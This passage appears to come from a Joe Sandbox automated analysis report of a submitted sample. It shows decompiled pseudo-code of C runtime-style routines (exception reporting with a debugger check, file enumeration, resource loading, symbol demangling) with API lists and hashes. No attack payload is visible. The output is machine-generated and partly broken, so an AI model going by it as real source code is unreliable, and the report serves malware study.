                      				intOrPtr _v88;
                      				char _v96;
                      				char _v100;
                      				intOrPtr _v616;
                      				char* _v620;
                      				void* _v624;
                      				intOrPtr _v628;
                      				char _v632;
                      				intOrPtr _v636;
                      				intOrPtr _v640;
                      				intOrPtr _v644;
                      				intOrPtr _v648;
                      				intOrPtr _v652;
                      				intOrPtr _v656;
                      				intOrPtr _v660;
                      				intOrPtr _v664;
                      				intOrPtr _v668;
                      				intOrPtr _v672;
                      				intOrPtr _v676;
                      				char _v816;
                      				long _t51;
                      				intOrPtr _t53;
                      				intOrPtr _t54;
                      				intOrPtr _t59;
                      				intOrPtr _t64;
                      				intOrPtr _t65;
                      
                      				_t65 = __esi;
                      				_t64 = __edi;
                      				_t59 = __edx;
                      				_t53 = __ebx;
                      				if(IsProcessorFeaturePresent(0x17) != 0) {
                      					_t54 = _a4;
                      					asm("int 0x29");
                      				}
                      				_push(3);
                      				E00958D10(_t41);
                      				_v640 = E0095AF80(_t64,  &_v816, 0, 0x2cc);
                      				_v644 = _t54;
                      				_v648 = _t59;
                      				_v652 = _t53;
                      				_v656 = _t65;
                      				_v660 = _t64;
                      				_v616 = ss;
                      				_v628 = cs;
                      				_v664 = ds;
                      				_v668 = es;
                      				_v672 = fs;
                      				_v676 = gs;
                      				asm("pushfd");
                      				_pop( *_t15);
                      				_v816 = 0x10001;
                      				_v632 = _v0;
                      				_v620 =  &_v0;
                      				_v636 =  *((intOrPtr*)( &_v0 - 4));
                      				E0095AF80(_t64,  &_v100, 0, 0x50);
                      				_v100 = 0x40000015;
                      				_v96 = 1;
                      				_v88 = _v0;
                      				if(IsDebuggerPresent() != 1) {
                      					_v5 = 0;
                      				} else {
                      					_v5 = 1;
                      				}
                      				_v6 = _v5;
                      				_v20.ExceptionRecord =  &_v100;
                      				_v20.ContextRecord =  &_v816;
                      				SetUnhandledExceptionFilter(0);
                      				_t51 = UnhandledExceptionFilter( &_v20);
                      				_v12 = _t51;
                      				if(_v12 == 0 && (_v6 & 0x000000ff) == 0) {
                      					_push(3);
                      					return E00958D10(_t51);
                      				}
                      				return _t51;
                      			}

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00958A4B
                      • IsDebuggerPresent.KERNEL32 ref: 00958B1B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958B47
                      • UnhandledExceptionFilter.KERNEL32(00000007), ref: 00958B51
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 6aafb3a2e7b820967f87de562c7cbbde226d0a54ffe57a9faa3722e08d9ed108
                      • Instruction ID: d55cb7fed28a6db04624a97bdee1007c9612b5d3e6299528f644f29e7dd56a80
                      • Opcode Fuzzy Hash: 6aafb3a2e7b820967f87de562c7cbbde226d0a54ffe57a9faa3722e08d9ed108
                      • Instruction Fuzzy Hash: E33135B8C193299ADF10DF61D8497DDBBB8AF58301F1081DAE80D6B281EB715A89CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E009ADAE0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed char* _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				struct _WIN32_FIND_DATAW _v600;
                      				signed char* _v604;
                      				char _v605;
                      				char _v606;
                      				char* _v612;
                      				char _v616;
                      				char _v617;
                      				signed int _v624;
                      				union _FINDEX_INFO_LEVELS _v628;
                      				signed int _v632;
                      				intOrPtr _v636;
                      				union _FINDEX_INFO_LEVELS _v640;
                      				union _FINDEX_INFO_LEVELS _v644;
                      				union _FINDEX_INFO_LEVELS _v648;
                      				union _FINDEX_INFO_LEVELS _v652;
                      				union _FINDEX_INFO_LEVELS _v656;
                      				char _v680;
                      				char _v704;
                      				signed int _t91;
                      				WCHAR* _t99;
                      				void* _t102;
                      				char* _t106;
                      				char* _t107;
                      				signed int _t111;
                      				void* _t117;
                      				union _FINDEX_INFO_LEVELS _t122;
                      				intOrPtr _t134;
                      				signed char* _t144;
                      				void* _t145;
                      				char* _t157;
                      				intOrPtr _t176;
                      				intOrPtr _t177;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t213;
                      				signed int _t215;
                      				void* _t216;
                      				void* _t217;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t145 = __ebx;
                      				_t213 = _t215;
                      				_t216 = _t215 - 0x2bc;
                      				_t91 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t91 ^ _t213;
                      				_v617 = 0;
                      				_v604 = _a8;
                      				while(_v604 != _a4 && (E009AE610( &_v605,  *_v604 & 0x000000ff) & 0x000000ff) == 0) {
                      					_t144 = E009AEEC0(_a4, _v604);
                      					_t216 = _t216 + 8;
                      					_v604 = _t144;
                      				}
                      				__eflags =  *_v604 - 0x3a;
                      				if( *_v604 != 0x3a) {
                      					L8:
                      					__eflags = E009AE610( &_v605,  *_v604 & 0x000000ff) & 0x000000ff;
                      					if(__eflags == 0) {
                      						_v628 = 0;
                      					} else {
                      						_v628 = _v604 - _a4 + 1;
                      					}
                      					_v644 = _v628;
                      					E009AE3B0( &_v704);
                      					_t99 = E009AEE80(_t145, _a4, _t211, __eflags,  &_v704, _a4);
                      					_t217 = _t216 + 8;
                      					E009AE340( &_v616, FindFirstFileExW(_t99, 0,  &_v600, 0, 0, 0));
                      					_t102 = E009AEDF0( &_v616);
                      					__eflags = _t102 - 0xffffffff;
                      					if(_t102 != 0xffffffff) {
                      						_v624 = E009AEFB0(_a12);
                      						do {
                      							E009AE360( &_v680);
                      							_t106 = E009AEE10(_t145,  &_v680, _t211, __eflags,  &_v680,  &(_v600.cFileName));
                      							_t217 = _t217 + 8;
                      							_v612 = _t106;
                      							_t107 = _v612;
                      							__eflags =  *_t107 - 0x2e;
                      							if( *_t107 != 0x2e) {
                      								L17:
                      								_t157 = _v612;
                      								__eflags =  *_t157 - 0x2e;
                      								if( *_t157 != 0x2e) {
                      									L21:
                      									_t111 = E009AD8A0(_v644, _t210, _v612, _a4, _v644, _a12);
                      									_t217 = _t217 + 0x10;
                      									_v632 = _t111;
                      									__eflags = _v632;
                      									if(_v632 == 0) {
                      										E009AE480();
                      										goto L24;
                      									} else {
                      										_v648 = _v632;
                      										E009AE480();
                      										E009AE460( &_v616);
                      										E009AE4C0();
                      										_t122 = _v648;
                      									}
                      								} else {
                      									_t176 = _v612;
                      									__eflags =  *((char*)(_t176 + (1 << 0))) - 0x2e;
                      									if( *((char*)(_t176 + (1 << 0))) != 0x2e) {
                      										goto L21;
                      									} else {
                      										_t177 = _v612;
                      										__eflags =  *((char*)(_t177 + (1 << 1)));
                      										if( *((char*)(_t177 + (1 << 1))) != 0) {
                      											goto L21;
                      										} else {
                      											E009AE480();
                      											goto L24;
                      										}
                      									}
                      								}
                      							} else {
                      								_t134 = _v612;
                      								__eflags =  *((char*)(_t134 + (1 << 0)));
                      								if( *((char*)(_t134 + (1 << 0))) != 0) {
                      									goto L17;
                      								} else {
                      									E009AE480();
                      									goto L24;
                      								}
                      							}
                      							goto L28;
                      							L24:
                      							_t202 =  &_v600;
                      							__eflags = FindNextFileW(E009AEDF0( &_v616),  &_v600);
                      						} while (__eflags != 0);
                      						_v636 = E009AEFB0(_a12);
                      						__eflags = _v624 - _v636;
                      						if(_v624 != _v636) {
                      							_v606 = 0;
                      							_t117 = E009AE5C0( &_v606);
                      							__eflags = _v636 - _v624;
                      							_t202 = E009AE980(_a12) + _v624 * 4;
                      							E009C0AE0(_t145, _v624, E009AE980(_a12) + _v624 * 4, _t210, _t211, E009AE980(_a12) + _v624 * 4, _v636 - _v624, 4, _t117);
                      							_v656 = 0;
                      							E009AE460( &_v616);
                      							E009AE4C0();
                      							_t122 = _v656;
                      						} else {
                      							_v652 = 0;
                      							E009AE460( &_v616);
                      							E009AE4C0();
                      							_t122 = _v652;
                      						}
                      					} else {
                      						_v640 = E009AD8A0(_a4, _t210, _a4, 0, 0, _a12);
                      						E009AE460( &_v616);
                      						E009AE4C0();
                      						_t122 = _v640;
                      					}
                      				} else {
                      					_t188 = _a4 + 1;
                      					__eflags = _v604 - _a4 + 1;
                      					if(_v604 == _a4 + 1) {
                      						goto L8;
                      					} else {
                      						_t202 = _a12;
                      						_t122 = E009AD8A0(_t188, _t210, _a4, 0, 0, _a12);
                      					}
                      				}
                      				L28:
                      				__eflags = _v8 ^ _t213;
                      				return E00957280(_t122, _t145, _v8 ^ _t213, _t202, _t210, _t211);
                      			}

                      APIs
                      • FindFirstFileExW.KERNEL32(00000000,00000000,?), ref: 009ADBF1
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009ADBFE
                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 009ADD93
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FileFind$FirstNextTimevecTimevec::_std::_
                      • String ID:
                      • API String ID: 2141543823-0
                      • Opcode ID: 320ad60db039522150438aa9af9075465eb1fa03cf24b159f780e275cf21e8c6
                      • Instruction ID: 82052dd1014d5210c1d9b89ab5afec077a30480c7b6987b19c1994c0e6690eba
                      • Opcode Fuzzy Hash: 320ad60db039522150438aa9af9075465eb1fa03cf24b159f780e275cf21e8c6
                      • Instruction Fuzzy Hash: 80A180719052689BDB24EF20CCA9BEEB779AFD6300F1045D9E40A6B691DF315E84CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00942B50(void* __esi, struct HINSTANCE__* _a4, struct HRSRC__* _a8, signed int _a12) {
                      				signed short* _v8;
                      				signed short* _v12;
                      				signed short* _v16;
                      				void* _v20;
                      				signed int _v24;
                      				void* _t40;
                      				long _t43;
                      				signed int _t46;
                      				signed int _t48;
                      				void* _t68;
                      				void* _t69;
                      
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v20 = E009D1520(LoadResource(_a4, _a8), _t69 - _t69);
                      				if(_v20 != 0) {
                      					_t40 = LockResource(_v20);
                      					__eflags = _t69 - _t69;
                      					_v8 = E009D1520(_t40, _t69 - _t69);
                      					__eflags = _v8;
                      					if(__eflags != 0) {
                      						_t43 = SizeofResource(_a4, _a8);
                      						__eflags = _t69 - _t69;
                      						_v16 = E009D1520(_t43, _t69 - _t69);
                      						_v12 = _v8 + _v16;
                      						_t46 = _a12 & 0x0000000f;
                      						__eflags = _t46;
                      						_v24 = _t46;
                      						while(1) {
                      							__eflags = _v24;
                      							if(_v24 <= 0) {
                      								break;
                      							}
                      							__eflags = _v8 - _v12;
                      							if(_v8 >= _v12) {
                      								break;
                      							}
                      							_t27 = ( *_v8 & 0x0000ffff) * 2; // 0x2
                      							_v8 = _v8 + _t27 + 2;
                      							_v24 = _v24 - 1;
                      						}
                      						__eflags = _v8 - _v12;
                      						if(__eflags < 0) {
                      							__eflags =  *_v8 & 0x0000ffff;
                      							if(__eflags != 0) {
                      								_t48 = _v8;
                      							} else {
                      								_t48 = 0;
                      							}
                      						} else {
                      							_t48 = 0;
                      						}
                      						goto L13;
                      					}
                      					_t48 = 0;
                      					goto L13;
                      				} else {
                      					_t48 = 0;
                      					L13:
                      					return E009D1520(_t48, _t68 - _t69 + 0x14);
                      				}
                      			}

                      APIs
                      • LoadResource.KERNEL32(?,?), ref: 00942B75
                      • LockResource.KERNEL32(00000000), ref: 00942B98
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Resource$LoadLock
                      • String ID:
                      • API String ID: 1037334470-0
                      • Opcode ID: 3a16378c668568cdc8f95230095d4247d53ddddfd2e12742dae52cc4e090fb4c
                      • Instruction ID: 729ca676b2ede5ddae8d05a91bfe08576205c2c479e483cf3031fdc34d71f621
                      • Opcode Fuzzy Hash: 3a16378c668568cdc8f95230095d4247d53ddddfd2e12742dae52cc4e090fb4c
                      • Instruction Fuzzy Hash: FC312D71D11219EFCB54EFA8D581AAEB7F5FF48305F608999E406A7200E7349E80DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00992720(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				char _v0;
                      				signed int _v8;
                      				intOrPtr _v524;
                      				char* _v528;
                      				void* _v532;
                      				intOrPtr _v536;
                      				char _v540;
                      				intOrPtr _v544;
                      				struct _EXCEPTION_RECORD* _v548;
                      				intOrPtr _v552;
                      				intOrPtr _v556;
                      				intOrPtr _v560;
                      				intOrPtr _v564;
                      				intOrPtr _v568;
                      				intOrPtr _v572;
                      				intOrPtr _v576;
                      				intOrPtr _v580;
                      				intOrPtr _v584;
                      				char _v724;
                      				intOrPtr _v792;
                      				intOrPtr _v800;
                      				char _v804;
                      				long _v808;
                      				int _v812;
                      				struct _EXCEPTION_POINTERS _v820;
                      				signed int _t45;
                      				struct _EXCEPTION_RECORD* _t49;
                      				intOrPtr _t59;
                      				char* _t61;
                      				char* _t67;
                      				intOrPtr _t71;
                      				intOrPtr _t72;
                      				signed int _t76;
                      				void* _t77;
                      
                      				_t72 = __esi;
                      				_t71 = __edi;
                      				_t59 = __ebx;
                      				_t74 = _t76;
                      				_t77 = _t76 - 0x330;
                      				_t45 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t45 ^ _t76;
                      				if(_a4 != 0xffffffff) {
                      					_push(_a4);
                      					E00958D10(_a4);
                      					_t77 = _t77 + 4;
                      				}
                      				E0095AF80(_t71,  &_v804, 0, 0x50);
                      				_t67 =  &_v724;
                      				E0095AF80(_t71, _t67, 0, 0x2cc);
                      				_t49 =  &_v804;
                      				_v820.ExceptionRecord = _t49;
                      				_t61 =  &_v724;
                      				_v820.ContextRecord = _t61;
                      				_v548 = _t49;
                      				_v552 = _t61;
                      				_v556 = _t67;
                      				_v560 = _t59;
                      				_v564 = _t72;
                      				_v568 = _t71;
                      				_v524 = ss;
                      				_v536 = cs;
                      				_v572 = ds;
                      				_v576 = es;
                      				_v580 = fs;
                      				_v584 = gs;
                      				asm("pushfd");
                      				_pop( *_t22);
                      				_v724 = 0x10001;
                      				_v540 = _v0;
                      				_v528 =  &_v0;
                      				_v544 =  *((intOrPtr*)( &_v0 - 4));
                      				_v804 = _a8;
                      				_v800 = _a12;
                      				_t70 = _v0;
                      				_v792 = _v0;
                      				_v812 = IsDebuggerPresent();
                      				SetUnhandledExceptionFilter(0);
                      				_v808 = UnhandledExceptionFilter( &_v820);
                      				if(_v808 == 0 && _v812 == 0 && _a4 != 0xffffffff) {
                      					_push(_a4);
                      					_t55 = E00958D10(_t55);
                      				}
                      				return E00957280(_t55, _t59, _v8 ^ _t74, _t70, _t71, _t72);
                      			}

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00992820
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0099282E
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0099283B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: dcd66539446b70681adc4433d23a089348cbe71a9f2bd35502c319921b89014a
                      • Instruction ID: 5a2bfe3060f23646247db143826fb5dfc8825de5ce5ffd4ea3201157e6be6cf9
                      • Opcode Fuzzy Hash: dcd66539446b70681adc4433d23a089348cbe71a9f2bd35502c319921b89014a
                      • Instruction Fuzzy Hash: C541E6B4C1122CABCB25DF55D8887D9B7B8BF58314F1082EAE80D66291E7305F85CF85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009675A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				signed int _v5;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				char _v88;
                      				signed int _v92;
                      				char _v96;
                      				signed int _v100;
                      				char _v104;
                      				signed int _v108;
                      				char _v112;
                      				signed int _v116;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				char _v280;
                      				char _v288;
                      				char _v296;
                      				char _v304;
                      				char _v312;
                      				char _v320;
                      				char _v328;
                      				signed int _t131;
                      				signed int _t142;
                      				signed int _t144;
                      				intOrPtr _t145;
                      				signed int _t149;
                      				intOrPtr _t153;
                      				void* _t177;
                      				void* _t180;
                      				void* _t185;
                      				signed int _t201;
                      				signed int _t205;
                      				signed int _t226;
                      				signed int _t229;
                      				void* _t243;
                      				void* _t244;
                      				void* _t245;
                      
                      				_t244 = __esi;
                      				_t243 = __edi;
                      				_t185 = __ebx;
                      				E0095F3F0( &_v16);
                      				_v5 = 0;
                      				while(E0096AB70( &_v16) == 0) {
                      					_t142 =  *0xb30640; // 0x0
                      					if( *_t142 == 0) {
                      						break;
                      					}
                      					_t229 =  *0xb30640; // 0x0
                      					if( *_t229 == 0x40) {
                      						break;
                      					}
                      					if(( *0xb3064c & 0x000000ff) == 0) {
                      						L7:
                      						_t144 = E0096A560( &_v16);
                      						if(_t144 == 0) {
                      							_v96 = E00960060("::", 2);
                      							_v92 = _t229;
                      							_t177 = E0095FAA0( &_v136,  &_v96,  &_v16);
                      							_t245 = _t245 + 0x14;
                      							E0095F820( &_v16, _t177);
                      							if((_v5 & 0x000000ff) != 0) {
                      								_t180 = E0095FAD0( &_v144, 0x5b,  &_v16);
                      								_t245 = _t245 + 0xc;
                      								E0095F820( &_v16, _t180);
                      								_v5 = 0;
                      							}
                      						}
                      						_t201 =  *0xb30640; // 0x0
                      						if( *_t201 != 0x3f) {
                      							_t145 = E0096A1E0(_t185, _t243, _t244,  &_v296, 1, 0);
                      							_t245 = _t245 + 0xc;
                      							_v72 = _t145;
                      							E0095F820( &_v16, E0095FB70(_v72,  &_v304,  &_v16));
                      							goto L41;
                      						} else {
                      							_t149 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t149 + 1;
                      							_t205 =  *0xb30640; // 0x0
                      							_v20 =  *_t205;
                      							_v20 = _v20 - 0x24;
                      							if(_v20 > 0x2d) {
                      								L38:
                      								_t153 = E00965B00(_t185, _t205, _t243, _t244,  &_v280);
                      								_t245 = _t245 + 4;
                      								_v68 = _t153;
                      								E0095F820( &_v16, E0095FB70(_v68,  &_v288,  &_v16));
                      								L39:
                      								L41:
                      								continue;
                      							}
                      							_t24 = _v20 + 0x967af8; // 0xcccccc04
                      							switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M00967AE0))) {
                      								case 0:
                      									 *0xb30640 =  *0xb30640 - 1;
                      									 *0xb30640 =  *0xb30640 - 1;
                      									__ecx =  &_v200;
                      									_v48 = E0096A1E0(__ebx, __edi, __esi,  &_v200, 1, 0);
                      									__edx =  &_v16;
                      									__eax =  &_v208;
                      									__ecx = _v48;
                      									__eax = E0095FB70(_v48,  &_v208,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E0095F820(__ecx, __eax);
                      									goto L39;
                      								case 1:
                      									__ecx =  &_v128;
                      									__eax = E0095F080( &_v128, 0xb30640, 0x40);
                      									_v104 = E00960060("`anonymous namespace\'", 0x15);
                      									_v100 = __edx;
                      									__ecx =  &_v16;
                      									__edx =  &_v104;
                      									 &_v216 = E0095FAA0( &_v216,  &_v104,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E0095F820( &_v16, __eax);
                      									__ecx =  *0xb30638; // 0x0
                      									__eax = E0096A590(__ecx);
                      									__eflags = __eax;
                      									if(__eax == 0) {
                      										__ecx =  &_v128;
                      										__ecx =  *0xb30638; // 0x0
                      										__eax = L0095FF70(__ecx,  &_v128);
                      									}
                      									goto L39;
                      								case 2:
                      									_t210 =  *0xb30640; // 0x0
                      									__eflags =  *((char*)(_t210 + (1 << 0))) - 0x5f;
                      									if(__eflags != 0) {
                      										L18:
                      										_t160 = E0095FAD0( &_v176, 0x60, E009644C0(_t185, _t243, _t244, __eflags,  &_v168));
                      										_t245 = _t245 + 0x10;
                      										_v40 = _t160;
                      										_v44 = E0095FBB0(_v40,  &_v184, 0x27);
                      										E0095F820( &_v16, E0095FB70(_v44,  &_v192,  &_v16));
                      										L19:
                      										goto L39;
                      									}
                      									_t216 =  *0xb30640; // 0x0
                      									__eflags =  *((char*)(_t216 + (1 << 1))) - 0x3f;
                      									if(__eflags != 0) {
                      										goto L18;
                      									}
                      									_t167 =  *0xb30640; // 0x0
                      									 *0xb30640 = _t167 + 1;
                      									_t169 = E00965E80(_t185, _t243, _t244,  &_v152, 0, 0);
                      									_t245 = _t245 + 0xc;
                      									_v36 = _t169;
                      									E0095F820( &_v16, E0095FB70(_v36,  &_v160,  &_v16));
                      									_t220 =  *0xb30640; // 0x0
                      									__eflags =  *_t220 - 0x40;
                      									if( *_t220 == 0x40) {
                      										_t173 =  *0xb30640; // 0x0
                      										_t174 = _t173 + 1;
                      										__eflags = _t174;
                      										 *0xb30640 = _t174;
                      									}
                      									goto L19;
                      								case 3:
                      									 *0xb30640 =  *0xb30640 + 1;
                      									 *0xb30640 =  *0xb30640 + 1;
                      									__eax =  &_v224;
                      									_v52 = E0096A1E0(__ebx, __edi, __esi,  &_v224, 1, 0);
                      									__ecx =  &_v232;
                      									__ecx = _v52;
                      									_v56 = E0095FBB0(_v52,  &_v232, 0x5d);
                      									__edx =  &_v16;
                      									__eax =  &_v240;
                      									__ecx = _v56;
                      									__eax = E0095FB70(_v56,  &_v240,  &_v16);
                      									__ecx =  &_v16;
                      									__eax = E0095F820(__ecx, __eax);
                      									_v5 = 1;
                      									goto L39;
                      								case 4:
                      									__ecx =  &_v28;
                      									__eax = E0095F3F0( &_v28);
                      									__ecx =  *0xb30640; // 0x0
                      									__ecx = __ecx + 1;
                      									__eflags = __ecx;
                      									 *0xb30640 = __ecx;
                      									while(1) {
                      										__edx =  &_v88;
                      										__eax = E0096A1E0(__ebx, __edi, __esi,  &_v88, 1, 0);
                      										__ecx =  &_v88;
                      										__eax = E0096AB70( &_v88);
                      										__eflags = __eax;
                      										if(__eax != 0) {
                      											__ecx =  &_v28;
                      											__eax = E0095F920( &_v28, 2);
                      										} else {
                      											__ecx =  &_v28;
                      											__eax = E0096A560( &_v28);
                      											__eflags = __eax;
                      											if(__eax != 0) {
                      												__ecx =  &_v88;
                      												__ecx =  &_v28;
                      												__eax = E0095F820( &_v28,  &_v88);
                      											} else {
                      												_v112 = E00960060("::", 2);
                      												_v108 = __edx;
                      												__eax =  &_v112;
                      												__ecx =  &_v248;
                      												__ecx =  &_v88;
                      												_v60 = E0095FB30( &_v88,  &_v248,  &_v112);
                      												__edx =  &_v28;
                      												__eax =  &_v256;
                      												__ecx = _v60;
                      												__eax = E0095FB70(_v60,  &_v256,  &_v28);
                      												__ecx =  &_v28;
                      												__eax = E0095F820( &_v28, __eax);
                      											}
                      										}
                      										__ecx =  &_v28;
                      										__eax = E0096AB70( &_v28);
                      										__eflags = __eax;
                      										if(__eax != 0) {
                      											break;
                      										}
                      										__edx =  *0xb30640; // 0x0
                      										__eax =  *__edx;
                      										__eflags =  *__edx - 0x40;
                      										if( *__edx != 0x40) {
                      											continue;
                      										}
                      										break;
                      									}
                      									__ecx =  &_v28;
                      									__eax = E0096AB70( &_v28);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__ecx =  &_v16;
                      										__eax = E0095F920(__ecx, 2);
                      									} else {
                      										__ecx =  &_v28;
                      										__edx =  &_v264;
                      										_v64 = E0095FAD0( &_v264, 0x5b,  &_v28);
                      										__eax =  &_v272;
                      										__ecx = _v64;
                      										__eax = E0095FBB0(_v64,  &_v272, 0x5d);
                      										__ecx =  &_v16;
                      										__eax = E0095F820( &_v16, __eax);
                      										__ecx =  *0xb30640; // 0x0
                      										__ecx = __ecx + 1;
                      										 *0xb30640 = __ecx;
                      									}
                      									goto L39;
                      								case 5:
                      									goto L38;
                      							}
                      						}
                      					}
                      					_t229 =  *0xb3064d & 0x000000ff;
                      					if(_t229 != 0) {
                      						goto L7;
                      					}
                      					E0095F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				_t226 =  *0xb30640; // 0x0
                      				_v32 =  *_t226;
                      				if(_v32 == 0) {
                      					_t131 = E0096A560( &_v16);
                      					if(_t131 == 0) {
                      						_v120 = E00960060("::", 2);
                      						_v116 = _t226;
                      						_v76 = E0095F350( &_v312, 1);
                      						_v80 = E0095FB30(_v76,  &_v320,  &_v120);
                      						E0095F820( &_v16, E0095FB70(_v80,  &_v328,  &_v16));
                      					} else {
                      						E0095F920( &_v16, 1);
                      					}
                      				} else {
                      					if(_v32 != 0x40) {
                      						E0095F920( &_v16, 2);
                      					}
                      				}
                      				E0095F240(_a4,  &_v16);
                      				return _a4;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009675AC
                      • Mailbox.LIBCMTD ref: 00967604
                      • DName::isEmpty.LIBCMTD ref: 00967614
                      • operator+.LIBVCRUNTIMED ref: 00967641
                      • Mailbox.LIBCMTD ref: 0096764D
                      • operator+.LIBVCRUNTIMED ref: 00967667
                      • Mailbox.LIBCMTD ref: 00967673
                      • DName::operator+.LIBCMTD ref: 00967729
                      • Mailbox.LIBCMTD ref: 00967732
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096775B
                        • Part of subcall function 009644C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 009644EB
                        • Part of subcall function 009644C0: Mailbox.LIBCMTD ref: 00964536
                      • operator+.LIBVCRUNTIMED ref: 0096776D
                        • Part of subcall function 0095FAD0: DName::operator+.LIBCMTD ref: 0095FAF1
                      • DName::operator+.LIBCMTD ref: 00967784
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBC0
                        • Part of subcall function 0095FBB0: DName::operator+=.LIBCMTD ref: 0095FBCD
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBD9
                      • Mailbox.LIBCMTD ref: 009677A3
                      • DName::operator+.LIBCMTD ref: 009677DE
                      • Mailbox.LIBCMTD ref: 009677E7
                      • DName::operator+.LIBCMTD ref: 00967A23
                      • Mailbox.LIBCMTD ref: 00967A2C
                      • DName::operator+.LIBCMTD ref: 0096779A
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • DName::isEmpty.LIBCMTD ref: 00967A52
                      • DName::operator=.LIBVCRUNTIMED ref: 00967A60
                      • DName::DName.LIBVCRUNTIMED ref: 00967A84
                      • DName::operator+.LIBCMTD ref: 00967A9A
                      • DName::operator+.LIBCMTD ref: 00967AB0
                      • Mailbox.LIBCMTD ref: 00967AB9
                      • DName::operator=.LIBVCRUNTIMED ref: 00967AC7
                      • Mailbox.LIBCMTD ref: 00967AD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
